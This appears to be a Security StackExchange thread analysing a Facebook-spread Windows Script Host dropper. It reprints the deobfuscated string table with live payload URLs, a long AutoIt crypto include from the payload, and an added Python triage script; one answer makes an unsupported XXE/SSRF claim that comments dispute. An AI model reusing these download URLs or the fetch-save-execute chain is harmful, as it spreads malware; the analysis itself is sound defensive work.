92

I got a notification on Facebook: "(a friend of mine) mentioned you in a comment". However, when I clicked it, Firefox tried to download the following file:

comment_24016875.jse

This is an obfuscated script which seems to download an executable (autoit.exe) and run it.

This is the part I managed to deobfuscate:

['Msxml2.XMLhttp', 'onreadystatechange', 'readyState', 'status', 'ADODB.Stream', 'open',
 'type', 'write', 'position', 'read', 'saveToFile', 'close', 'GET', 'send',
 'Scripting.FileSystemObject', 'WScript.Shell', 'Shell.Application', '%APPDATA%\\',
 'ExpandEnvironmentStrings', 'Mozila', 'https://www.google.com',
 'http://userexperiencestatics.net/ext/Autoit.jpg',   '\\autoit.exe',
 'http://userexperiencestatics.net/ext/bg.jpg',       '\\bg.js',
 'http://userexperiencestatics.net/ext/ekl.jpg',      '\\ekl.au3',
 'http://userexperiencestatics.net/ext/ff.jpg',       '\\ff.zip',
 'http://userexperiencestatics.net/ext/force.jpg',    '\\force.au3',
 'http://userexperiencestatics.net/ext/sabit.jpg',    '\\sabit.au3',
 'http://userexperiencestatics.net/ext/manifest.jpg', '\\manifest.json',
 'http://userexperiencestatics.net/ext/run.jpg',      '\\run.bat',
 'http://userexperiencestatics.net/ext/up.jpg',       '\\up.au3',
 'http://whos.amung.us/pingjs/?k=pingjse346',         '\\ping.js',
 'http://whos.amung.us/pingjs/?k=pingjse3462',        '\\ping2.js', '']

Is this an exploit on Facebook? Is it possible that my friend got a virus which targets their contacts by tagging them on malicious links? Should I report this to Facebook? If so, how?

Michael
Nacib Neme
  • Is that link something you re-uploaded or the actual link you were sent? I ask because I would like to get the original link taken down. – Alexander O'Mara Jun 25 '16 at 16:15
  • That's the original link. – Nacib Neme Jun 25 '16 at 17:22
  • Well I hope that didn't autorun, because I wasn't expecting my browser to download that when I clicked the link. – JamEngulfer Jun 25 '16 at 18:48
  • I do not believe your friend was targeted. You cannot control the content of notifications. If anything, Facebook itself was exploited with a completely fraudulent notification. – user64742 Jun 28 '16 at 02:51
  • Question from the peanut gallery: Would a reasonable anti-virus package (e.g., Norton) have caught this? – Hot Licks Jun 28 '16 at 03:10
  • I'm dumb but you mean you clicked on the FB notification and *that* notification link got you to download the malware, or you clicked on whatever link/post your friend tagged you in? – Gruber Jun 28 '16 at 07:10
  • I think the malware is incomplete because it only partially succeeded to infect the server, maybe some third-party tool blocked some parts of the malware? – CoffeDeveloper Jun 28 '16 at 09:23

4 Answers

105

This is a typical obfuscated JavaScript malware which targets the Windows Script Host to download the rest of the payload. In this case, it downloads what appears to be mainly a Chrome Extension (manifest.json and bg.js), the autoit Windows executable, and some autoit scripts which install them. All of these files are named with .jpg extensions on the (likely compromised) server they are hosted on, to be less conspicuous.

The malware appears to be partially incomplete or otherwise underdeveloped or perhaps based off some other malware (quality is very low). Many of the autoit scripts don't actually do anything, and what appears to be a ZIP meant to contain a Firefox extension is actually empty. The autoit scripts are a ton of includes combined into a single file, but only one (ekl) actually has a payload at the end.

The one active autoit script which runs on infection replaces the Chrome, IE, and possibly other browser shortcuts with a shortcut to Chrome with the necessary arguments to run the malicious Chrome extension.

The Chrome extension is mainly how this malware is being propagated. It does some nasty things like blacklisting antivirus software domains, and sending Facebook messages automatically. Actually there was a webservice back end at http://appcdn.co/datajs serving some scripts which would be injected on any page a user visited based on the URL currently being viewed, which was how the Facebook messages were being posted. This service is now offline, likely taken down.

Is this an exploit on Facebook?

Not exactly; more like abuse of Facebook. Facebook's code hasn't been exploited; your friend just has an infected browser phishing their contacts on their behalf.

Is it possible that my friend got a virus which targets their contacts by tagging them on malicious links?

Yep, that's exactly how this malware is spreading itself.

Should I report this to Facebook? If so, how?

Yes, see How to Report Things in the Facebook help center.

Getting the following URLs taken offline by contacting their hosts would also be good.

http://userexperiencestatics.net/ext/Autoit.jpg
http://userexperiencestatics.net/ext/bg.jpg
http://userexperiencestatics.net/ext/ekl.jpg
http://userexperiencestatics.net/ext/ff.jpg
http://userexperiencestatics.net/ext/force.jpg
http://userexperiencestatics.net/ext/sabit.jpg
http://userexperiencestatics.net/ext/manifest.jpg
http://userexperiencestatics.net/ext/run.jpg
http://userexperiencestatics.net/ext/up.jpg
http://whos.amung.us/pingjs/?k=pingjse346
http://whos.amung.us/pingjs/?k=pingjse3462
http://appcdn.co/datajs

Unfortunately, CloudFlare still has not taken the userexperiencestatics.net URLs down though I contacted them shortly after posting this answer, and I don't know who is actually hosting these files. CloudFlare just emailed me to say they restricted access to the files, and say they will notify the host.

UPDATE:

After I and likely others reported the .jse URL to Google, they appear to have taken down the file. If you find any more copies, those should also be reported. It seems people have been receiving the files from numerous sources.

MORE INFO:

This malware and post is getting a lot of attention, so I'll add some more info to address people's questions:

Will this file automatically run when downloaded?

Probably not unless you have configured your browser to do so. It is meant to trick you into opening it.

Can it infect my phone, or a non-Windows computer?

As far as I know, Windows is the only OS which can run this malware. As I mentioned, it uses the Windows Script Host. I don't believe even Windows phone is vulnerable, though I don't know much about Windows phone.

UPDATE ON RANSOMWARE:

Previously it was assumed the autoit scripts contained ransomware; however, after further inspection this appears not to be the case. There is just a bunch of unused crypto functions obscuring the actual payload, which I've mostly deobfuscated to this.

UPDATE ON CHROME EXTENSION:

The unpacked Chrome extension code can be viewed here. Details on what it did are integrated above.

UPDATE FOR JSE SCRIPT:

My de-obfuscated comment_24016875.jse script can be viewed here.

Alexander O'Mara
  • I've reported the `userexperiencestatics.net` URL to Google and MyWOT. The `whos.amung.us` URL appears to simply be some form of analytics. – Nathan Osman Jun 26 '16 at 03:57
  • @NathanOsman Yep, I reported the `.jse` file to Google earlier, and it appears to have been taken down. I reported the `userexperiencestatics.net` URLs to CloudFlare, but no results yet. – Alexander O'Mara Jun 26 '16 at 04:00
  • The `.jpg` files are actually PE executable files with the incorrect file extension. They need to be taken down too. – Nathan Osman Jun 26 '16 at 04:01
  • @NathanOsman Well, one is. Others are JavaScript, autoit scripts, and JSON. – Alexander O'Mara Jun 26 '16 at 04:03
  • What looks like Facebook's fault to me: the script was downloaded for me when I clicked a link I received from Facebook in my mail (https://facebook.com/l.php?u=https%3A%2F%2Fdoc.google.com…) even though the post itself was deleted by then. I believe that their service was exploited to pass an external URL as a direct link to a comment. This redirect service has been criticized before: http://www.codehesive.com/index.php/archive/facebook-privacy-and-the-mystery-of-l-php/ – Alex Cohn Jun 26 '16 at 13:11
  • @AlexanderO'Mara Could you incorporate that this was indeed an XXE vulnerability in Facebook's code, since the link to the malware was not just posted as a comment, but actually sent by Facebook to private email accounts? – Falco Jun 27 '16 at 08:16
  • @Falco Sure, but first could you clarify how you know this happened? I haven't been able to find evidence of it, but I also did not receive one of these emails. – Alexander O'Mara Jun 27 '16 at 18:06
  • Re: "The malware appears to be partially incomplete": The author of the malware may not have very high coding standards: from your description, it sounds like a lot of copy-and-pasting happened, or a lot of starting various angles and then discarding them, with no cleanup afterward once (some) stuff was working. – ruakh Jun 27 '16 at 21:26
  • I did receive this email. – Alex Cohn Jul 06 '16 at 09:45
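An added triage example (not code from the question or from any answer) that works over the deobfuscated string table the asker posted: it pairs each download URL with the local name the script saves it under, flags the ".jpg on the server, script or executable on disk" disguise the answer above describes, lists the WSH/COM objects that make up the fetch-write-execute chain, and classifies fetched bytes by their magic instead of their extension (the point of Nathan Osman's comment that one of the "images" is a PE file). The indicator descriptions are the usual role of each object in such a chain and an assumption about this sample, since the posted fragment shows only the string table; the byte samples in the usage are constructed.

```python
import os.path
import re
from urllib.parse import urlparse

# Sample input: the deobfuscated string table posted in the question, copied as-is.
STRING_TABLE = [
    'Msxml2.XMLhttp', 'onreadystatechange', 'readyState', 'status', 'ADODB.Stream', 'open',
    'type', 'write', 'position', 'read', 'saveToFile', 'close', 'GET', 'send',
    'Scripting.FileSystemObject', 'WScript.Shell', 'Shell.Application', '%APPDATA%\\',
    'ExpandEnvironmentStrings', 'Mozila', 'https://www.google.com',
    'http://userexperiencestatics.net/ext/Autoit.jpg',   '\\autoit.exe',
    'http://userexperiencestatics.net/ext/bg.jpg',       '\\bg.js',
    'http://userexperiencestatics.net/ext/ekl.jpg',      '\\ekl.au3',
    'http://userexperiencestatics.net/ext/ff.jpg',       '\\ff.zip',
    'http://userexperiencestatics.net/ext/force.jpg',    '\\force.au3',
    'http://userexperiencestatics.net/ext/sabit.jpg',    '\\sabit.au3',
    'http://userexperiencestatics.net/ext/manifest.jpg', '\\manifest.json',
    'http://userexperiencestatics.net/ext/run.jpg',      '\\run.bat',
    'http://userexperiencestatics.net/ext/up.jpg',       '\\up.au3',
    'http://whos.amung.us/pingjs/?k=pingjse346',         '\\ping.js',
    'http://whos.amung.us/pingjs/?k=pingjse3462',        '\\ping2.js', '',
]

# COM objects and methods that, seen together in one WSH script, form the classic
# "fetch over HTTP, write to disk, execute" chain. Roles are the usual ones for
# these objects (assumption about this sample; only the string table is posted).
CHAIN_INDICATORS = {
    'Msxml2.XMLhttp': 'HTTP client (fetch each payload)',
    'ADODB.Stream': 'binary stream (hold the response body)',
    'saveToFile': 'ADODB.Stream.SaveToFile (the actual file drop)',
    'Scripting.FileSystemObject': 'file-system access',
    'WScript.Shell': 'Run() and %APPDATA% expansion',
    'Shell.Application': 'ShellExecute of dropped files',
}

IMAGE_EXTS = {'.jpg', '.jpeg', '.png', '.gif'}
ACTIVE_EXTS = {'.exe', '.js', '.jse', '.vbs', '.bat', '.au3', '.zip', '.json'}


def find_chain_indicators(strings):
    """Return the download-and-execute indicators present in a string table."""
    present = {s.lower() for s in strings}
    return {k: v for k, v in CHAIN_INDICATORS.items() if k.lower() in present}


def pair_drops(strings):
    """Pair every URL with the '\\name' entry that follows it in the table.

    Returns (url, local_name, disguised) tuples; disguised is True when the URL
    claims an image extension but the local name is a script or executable.
    """
    drops = []
    for i in range(len(strings) - 1):
        url, nxt = strings[i], strings[i + 1]
        if not re.match(r'https?://', url, re.I) or not nxt.startswith('\\'):
            continue  # e.g. the bare google.com entry has no drop name after it
        url_ext = os.path.splitext(urlparse(url).path)[1].lower()
        local_ext = os.path.splitext(nxt)[1].lower()
        disguised = url_ext in IMAGE_EXTS and local_ext in ACTIVE_EXTS
        drops.append((url, nxt.lstrip('\\'), disguised))
    return drops


def sniff(data):
    """Classify fetched bytes by their magic, ignoring the extension on the URL."""
    if not data:
        return 'empty'            # the answer notes the Firefox "extension" ZIP was empty
    if data[:2] == b'MZ':
        return 'PE executable'
    if data[:3] == b'\xff\xd8\xff':
        return 'JPEG image'
    if data[:4] == b'PK\x03\x04':
        return 'ZIP archive'
    if data.lstrip()[:1] in (b'{', b'['):
        return 'JSON/JavaScript text'
    try:
        data.decode('utf-8')
        return 'text'
    except UnicodeDecodeError:
        return 'unknown binary'


if __name__ == '__main__':
    for name, role in find_chain_indicators(STRING_TABLE).items():
        print(f'indicator  {name:28} {role}')
    for url, local, disguised in pair_drops(STRING_TABLE):
        print(f'{"DISGUISED" if disguised else "drop     "} {url} -> %APPDATA%\\{local}')
    # Constructed sample bytes standing in for fetched "jpg" files.
    for blob in (b'MZ\x90\x00\x03\x00\x00\x00', b'\xff\xd8\xff\xe0\x00\x10JFIF', b''):
        print('sniff', sniff(blob))
```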
29

I haven't got the time to fully reverse-engineer what this script does, but it seems to link to several .jpg files that are actually not images but text, and then references some .au3 files, suggesting that it actually saves those .jpg files under that extension.

Those .au3 files seem to match AutoIt's file extension and indeed they look like valid AutoIt scripts. Here's a part of one, the ekl.jpg:

Func _crypt_startup()
    If __crypt_refcount() = 0 Then
        Local $hadvapi32 = DllOpen("Advapi32.dll")
        If $hadvapi32 = -1 Then Return SetError(1, 0, False)
        __crypt_dllhandleset($hadvapi32)
        Local $iproviderid = $prov_rsa_aes
        Local $aret = DllCall(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext)
        If @error OR NOT $aret[0] Then
            Local $ierror = @error + 10, $iextended = @extended
            DllClose(__crypt_dllhandle())
            Return SetError($ierror, $iextended, False)
        Else
            __crypt_contextset($aret[1])
        EndIf
    EndIf
    __crypt_refcountinc()
    Return True
EndFunc

Func _crypt_shutdown()
    __crypt_refcountdec()
    If __crypt_refcount() = 0 Then
        DllCall(__crypt_dllhandle(), "bool", "CryptReleaseContext", "handle", __crypt_context(), "dword", 0)
        DllClose(__crypt_dllhandle())
    EndIf
EndFunc

Func _crypt_derivekey($vpassword, $ialg_id, $ihash_alg_id = $calg_md5)
    Local $aret = 0, $hbuff = 0, $hcrypthash = 0, $ierror = 0, $iextended = 0, $vreturn = 0
    _crypt_startup()
    Do
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihash_alg_id, "ptr", 0, "dword", 0, "handle*", 0)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 10
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $hcrypthash = $aret[5]
        $hbuff = DllStructCreate("byte[" & BinaryLen($vpassword) & "]")
        DllStructSetData($hbuff, 1, $vpassword)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialg_id, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 30
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $vreturn = $aret[5]
    Until True
    If $hcrypthash <> 0 Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_destroykey($hcryptkey)
    Local $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDestroyKey", "handle", $hcryptkey)
    Local $ierror = @error, $iextended = @extended
    _crypt_shutdown()
    If $ierror OR NOT $aret[0] Then
        Return SetError($ierror + 10, $iextended, False)
    Else
        Return True
    EndIf
EndFunc

Func _crypt_encryptdata($vdata, $vcryptkey, $ialg_id, $bfinal = True)
    Local $ireqbuffsize = 0, $aret = 0, $hbuff = 0, $ierror = 0, $iextended = 0, $vreturn = 0
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error + 100
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
        EndIf
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vdata), "dword", 0)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $ireqbuffsize = $aret[6]
        $hbuff = DllStructCreate("byte[" & $ireqbuffsize & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata), "dword", DllStructGetSize($hbuff))
        If @error OR NOT $aret[0] Then
            $ierror = @error + 30
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $vreturn = DllStructGetData($hbuff, 1)
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_decryptdata($vdata, $vcryptkey, $ialg_id, $bfinal = True)
    Local $aret = 0, $hbuff = 0, $htempstruct = 0, $ierror = 0, $iextended = 0, $iplaintextsize = 0, $vreturn = 0
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error + 100
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
        EndIf
        $hbuff = DllStructCreate("byte[" & BinaryLen($vdata) + 1000 & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata))
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $iplaintextsize = $aret[6]
        $htempstruct = DllStructCreate("byte[" & $iplaintextsize & "]", DllStructGetPtr($hbuff))
        $vreturn = DllStructGetData($htempstruct, 1)
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_hashdata($vdata, $ialg_id, $bfinal = True, $hcrypthash = 0)
    Local $aret = 0, $hbuff = 0, $ierror = 0, $iextended = 0, $ihashsize = 0, $vreturn = 0
    _crypt_startup()
    Do
        If $hcrypthash = 0 Then
            $aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ialg_id, "ptr", 0, "dword", 0, "handle*", 0)
            If @error OR NOT $aret[0] Then
                $ierror = @error + 10
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
            $hcrypthash = $aret[5]
        EndIf
        $hbuff = DllStructCreate("byte[" & BinaryLen($vdata) & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        If $bfinal Then
            $aret = DllCall(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashsize, "dword*", 0, "dword*", 4, "dword", 0)
            If @error OR NOT $aret[0] Then
                $ierror = @error + 30
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
            $ihashsize = $aret[3]
            $hbuff = DllStructCreate("byte[" & $ihashsize & "]")
            $aret = DllCall(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashval, "struct*", $hbuff, "dword*", DllStructGetSize($hbuff), "dword", 0)
            If @error OR NOT $aret[0] Then
                $ierror = @error + 40
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
            $vreturn = DllStructGetData($hbuff, 1)
        Else
            $vreturn = $hcrypthash
        EndIf
    Until True
    If $hcrypthash <> 0 AND $bfinal Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
    _crypt_shutdown()
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_hashfile($sfile, $ialg_id)
    Local $btempdata = 0, $hfile = 0, $hhashobject = 0, $ierror = 0, $iextended = 0, $vreturn = 0
    _crypt_startup()
    Do
        $hfile = FileOpen($sfile, $fo_binary)
        If $hfile = -1 Then
            $ierror = 1
            $vreturn = -1
            ExitLoop
        EndIf
        Do
            $btempdata = FileRead($hfile, 512 * 1024)
            If @error Then
                $vreturn = _crypt_hashdata($btempdata, $ialg_id, True, $hhashobject)
                If @error Then
                    $ierror = @error
                    $iextended = @extended
                    $vreturn = -1
                    ExitLoop 2
                EndIf
                ExitLoop 2
            Else
                $hhashobject = _crypt_hashdata($btempdata, $ialg_id, False, $hhashobject)
                If @error Then
                    $ierror = @error + 100
                    $iextended = @extended
                    $vreturn = -1
                    ExitLoop 2
                EndIf
            EndIf
        Until False
    Until True
    _crypt_shutdown()
    If $hfile <> -1 Then FileClose($hfile)
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_encryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialg_id)
    Local $btempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = FileGetSize($ssourcefile), $iread = 0, $breturn = True
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error
                $iextended = @extended
                $breturn = False
                ExitLoop
            EndIf
        EndIf
        $hinfile = FileOpen($ssourcefile, $fo_binary)
        If @error Then
            $ierror = 2
            $breturn = False
            ExitLoop
        EndIf
        $houtfile = FileOpen($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary)
        If @error Then
            $ierror = 3
            $breturn = False
            ExitLoop
        EndIf
        Do
            $btempdata = FileRead($hinfile, 1024 * 1024)
            $iread += BinaryLen($btempdata)
            If $iread = $ifilesize Then
                $btempdata = _crypt_encryptdata($btempdata, $vcryptkey, $calg_userkey, True)
                If @error Then
                    $ierror = @error + 400
                    $iextended = @extended
                    $breturn = False
                EndIf
                FileWrite($houtfile, $btempdata)
                ExitLoop 2
            Else
                $btempdata = _crypt_encryptdata($btempdata, $vcryptkey, $calg_userkey, False)
                If @error Then
                    $ierror = @error + 500
                    $iextended = @extended
                    $breturn = False
                    ExitLoop 2
                EndIf
                FileWrite($houtfile, $btempdata)
            EndIf
        Until False
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    If $hinfile <> -1 Then FileClose($hinfile)
    If $houtfile <> -1 Then FileClose($houtfile)
    Return SetError($ierror, $iextended, $breturn)
EndFunc

Func _crypt_decryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialg_id)
    Local $btempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = FileGetSize($ssourcefile), $iread = 0, $breturn = True
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error
                $iextended = @extended
                $breturn = False
                ExitLoop
            EndIf
        EndIf
        $hinfile = FileOpen($ssourcefile, $fo_binary)
        If @error Then
            $ierror = 2
            $breturn = False
            ExitLoop
        EndIf
        $houtfile = FileOpen($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary)
        If @error Then
            $ierror = 3
            $breturn = False
            ExitLoop
        EndIf
        Do
            $btempdata = FileRead($hinfile, 1024 * 1024)
            $iread += BinaryLen($btempdata)
            If $iread = $ifilesize Then
                $btempdata = _crypt_decryptdata($btempdata, $vcryptkey, $calg_userkey, True)
                If @error Then
                    $ierror = @error + 400
                    $iextended = @extended
                    $breturn = False
                EndIf
                FileWrite($houtfile, $btempdata)
                ExitLoop 2
            Else
                $btempdata = _crypt_decryptdata($btempdata, $vcryptkey, $calg_userkey, False)
                If @error Then
                    $ierror = @error + 500
                    $iextended = @extended
                    $breturn = False
                    ExitLoop 2
                EndIf
                FileWrite($houtfile, $btempdata)
            EndIf
        Until False
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    If $hinfile <> -1 Then FileClose($hinfile)
    If $houtfile <> -1 Then FileClose($houtfile)
    Return SetError($ierror, $iextended, $breturn)
EndFunc

Func _crypt_genrandom($pbuffer, $isize)
    _crypt_startup()
    Local $aret = DllCall(__crypt_dllhandle(), "bool", "CryptGenRandom", "handle", __crypt_context(), "dword", $isize, "struct*", $pbuffer)
    Local $ierror = @error + 10, $iextended = @extended
    _crypt_shutdown()
    If $ierror OR (NOT $aret[0]) Then
        Return SetError($ierror, $iextended, False)
    Else
        Return True
    EndIf
EndFunc

Func __crypt_refcount()
    Return $__g_acryptinternaldata[0]
EndFunc

Func __crypt_refcountinc()
    $__g_acryptinternaldata[0] += 1
EndFunc

Func __crypt_refcountdec()
    If $__g_acryptinternaldata[0] > 0 Then $__g_acryptinternaldata[0] -= 1
EndFunc

Func __crypt_dllhandle()
    Return $__g_acryptinternaldata[1]
EndFunc

Func __crypt_dllhandleset($hadvapi32)
    $__g_acryptinternaldata[1] = $hadvapi32
EndFunc

Func __crypt_context()
    Return $__g_acryptinternaldata[2]
EndFunc

Func __crypt_contextset($hcryptcontext)
    $__g_acryptinternaldata[2] = $hcryptcontext
EndFunc

As you can see there is crypto-related code suggesting this is a (quite crappy and amateur) ransomware. Feel free to reverse engineer everything else.

André Borie
  • The referenced AutoIt script is just an official include (Crypt.au3); it does not contain any active code. It is necessary because the virus gets compiled locally to prevent checksum recognition. While the existence of a crypto include may be a good indicator of using crypto, it doesn't mean it's ransomware. AutoIt has enough tools to be good ransomware anyways. – James Cameron Jun 27 '16 at 09:03
  • @JamesCameron is right, the autoit scripts are actually just concatenated with a bunch of dependency headers. Only one actually has any active code from what I see, in addition to the code shared by all the scripts. – Alexander O'Mara Jun 27 '16 at 20:48
15

From what it looks like, a malicious actor leveraged what is known as an XML External Entity (XXE) vulnerability and then a Server-Side Request Forgery (SSRF).

Facebook's servers were tricked into linking a malicious XML file from another domain, processed it and served it up to you. Here is the XXE cheat sheet and SSRF bible's cheat sheet, if you're interested you can study up on it.

Think about it...your obfuscated script had the following (msxml2.XMLhttp method and stated it came from google).

Specifically, it used "the ADODB.Stream Object to Send Binary Files to the Browser through ASP."

In short, yes, it leveraged an XXE (via ASP writing an XML document) and forged (SSRF) it, stating it came from Google.

grepNstepN
  • Can you clarify how you arrived at this conclusion? – Alexander O'Mara Jun 27 '16 at 17:23
  • Think about it...your obfuscated script had the following (msxml2.XMLhttp method and stated it came from google). Specifically, it used "the ADODB.Stream Object to Send Binary Files to the Browser through ASP". Check out this link https://support.microsoft.com/en-us/kb/276488. In short, yes, it leveraged an XXE (via ASP writing an XML document) and forged (SSRF) it, stating it came from Google. Read the link, it explains the aforementioned ADODB class to send a file. – grepNstepN Jun 28 '16 at 13:51
  • Umm, that script is for downloading the remaining malware files as binary files and running them. It does not itself post anything to Facebook (the script does not contain any reference to Facebook), nor could it, because it runs in Windows Script Host which would not have any active browser sessions. The Chrome extension it installed was responsible for making the forged Facebook messages. I'll add the de-obfuscated script to my answer. – Alexander O'Mara Jun 28 '16 at 16:47
  • Correct me if I'm wrong, but the asker clicked a link in a Facebook message that downloads then runs a script, which means it's technically from Facebook (same-origin policy). Said script states it's downloading info from Google (see earlier link). As an aside, thanks for telling us about the payload Alexander! That's some good DFIR. However his question is the realm of network security...infosec can be boiled down to finding vulns (bughunting), defense in depth & early warning (netSec) and responding after an attack (DFIR). If you skip the netSec and bughunting, then you're doing infosec wrong. – grepNstepN Jun 28 '16 at 17:42
  • Please note: I'm addressing the part of his question on whether this was an exploit (from his description it is) and how the script was downloaded (via XXE and SSRF). There's a saying that's popular on the full disclosure mailing list [seclists.org/fulldisclosure]: Yes, locally run programs lead to exploitation. From an attacker AND defender's standpoint, once you've got your payload on the box (once it's downloaded) and you can execute it, it's game over. – grepNstepN Jun 28 '16 at 17:43
10

Is this an exploit on Facebook?

Most likely. The unscrupulous are always trying to find ways to gain access to bank accounts, passwords, friend lists, and anything else they can do to turn a buck.

Is it possible that my friend got a virus which targets their contacts by tagging them on malicious links?

There's no reason to think otherwise. The majority of computer users don't even know what a virus is, how to "catch" a virus, or what to do once they've been infected. If it were me, I'd track down the friend, send them a link to an antivirus program, and offer to help them out. Of course, depending on your friends, you might not be so kind, but I'm a fairly strong believer that I'm meant to help humanity as best I can.

Should I report this to Facebook?

Definitely. It won't get your friend in trouble, but it may help them track down the shares and ultimately reduce the number of people that are affected by this virus/malware/scam.

If so, how?

Go to the original post, click on the option to flag the post, and go through the wizard. You'll be notified if they take action, I believe.

One final note: Microsoft already seems to be aware of this file; when I tried to download it in IE Edge, I received a warning that the file was dangerous and could not be saved. Anyone using SmartScreen will probably be safe, and this virus doesn't appear to target non-Microsoft systems. Most likely, most of your less-savvy friends and family should be okay, unless they're still running XP, in which case you should suggest they upgrade to at least 7.

phyrfox
  • *"send them a link to an antivirus program"* Tell them to do a clean install instead. Said malware also tries to blacklist antivirus software in Chrome at least. – Alexander O'Mara Jun 25 '16 at 16:57
  • I cannot "go to the original post". Clicking the notification redirects me directly to the download. – Nacib Neme Jun 25 '16 at 17:26